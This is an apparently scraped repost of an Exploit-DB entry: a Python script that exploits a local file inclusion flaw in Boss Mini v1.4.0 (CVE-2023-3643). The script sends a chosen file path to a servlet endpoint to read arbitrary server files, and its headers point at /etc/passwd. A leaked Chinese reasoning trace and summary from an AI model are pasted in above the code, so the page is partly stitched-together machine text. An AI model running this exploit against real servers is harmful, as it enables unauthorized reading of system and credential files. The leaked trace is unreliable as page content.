[webapps] Boss Mini v1.4.0 - Local File Inclusion (LFI)
嗯,用户发来一个请求,让我帮他总结一篇文章的内容,控制在一百个字以内,而且不需要特定的开头。首先,我需要仔细阅读用户提供的文章内容。 这篇文章看起来是一个关于Boss Mini v1.4.0的本地文件包含漏洞的利用代码。作者是nltt0,日期是2023年7月12日。代码部分用Python编写,使用了requests库来发送HTTP请求。代码中有一个banner,然后是参数解析器,用来接收目标域名和要读取的本地文件路径。 接着,代码构造了一个URL,并对文件路径进行了URL编码。然后设置了请求头,包括Host、User-Agent、Content-Type等。数据部分包含了一个path参数,指向目标文件。最后,发送了一个POST请求,并检查响应状态码是否为200,如果是,则打印响应内容。 总结一下,这篇文章主要展示了如何利用Boss Mini软件中的LFI漏洞来读取任意本地文件。因此,在总结时需要涵盖漏洞名称、影响版本、利用方法以及作者信息。 用户的要求是控制在100字以内,并且直接描述文章内容。所以需要简洁明了地表达出关键点:漏洞名称、版本、作者、利用方法和影响。 可能需要注意的是,避免使用“文章内容总结”这样的开头词,直接进入描述。同时确保所有关键信息都被涵盖进去。 最后,检查字数是否符合要求,并确保语言流畅自然。 </think> 该文章展示了针对Boss Mini v1.4.0版本的本地文件包含(LFI)漏洞(CVE-2023-3643)的利用方法。作者nltt0提供了Python脚本代码,通过构造特定请求读取目标服务器上的任意本地文件。 2026-3-3 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:6 收藏

# Exploit Title: Boss Mini v1.4.0 - Local File Inclusion (LFI)
# Date: 07/12/2023
# Exploit Author: nltt0
# Version: 1.4.0 (Build 6221)
# CVE: CVE-2023-3643

from requests import post 
from urllib.parse import quote
from argparse import ArgumentParser

banner = r"""
_____       _                              _____ 
/  __ \     | |                            /  ___|
| /  \/ __ _| | __ _ _ __   __ _  ___  ___ \ `--. 
| |    / _` | |/ _` | '_ \ / _` |/ _ \/ __| `--. \
| \__/\ (_| | | (_| | | | | (_| | (_) \__ \/\__/ /
\____/\__,_|_|\__,_|_| |_|\__, |\___/|___/\____/ 
                            __/ |                 
                          |___/                  
                
        by nltt0 [https://github.com/nltt-br]
        
"""

print(banner)

try:
    parser = ArgumentParser(description='Local file inclusion [Boss Mini]')
    parser.add_argument('--domain', required=True, help='Application domain')
    parser.add_argument('--file', required=True, help='Local file')

    args = parser.parse_args()
    host = args.domain
    file = args.file
    url = '{}/boss/servlet/document'.format(host)
    file2 = quote(file, safe='')

    headers = {
        'Host': host,
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0',
        'Content-Type': 'application/x-www-form-urlencoded',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange',
        'Referer': 'https://{}/boss/app/report/popup.html?/etc/passwd'.format(host)
    }


    data = {
        'path': file2
    }

    try:
        req = post(url, headers=headers, data=data, verify=False)
        if req.status_code == 200:
            print(req.text)

    except Exception as e:
        print('Error in {}'.format(e))   
        

except Exception as e:
    print('Error in {}'.format(e))
            

文章来源: https://www.exploit-db.com/exploits/52482
如有侵权请联系:admin#unsafe.sh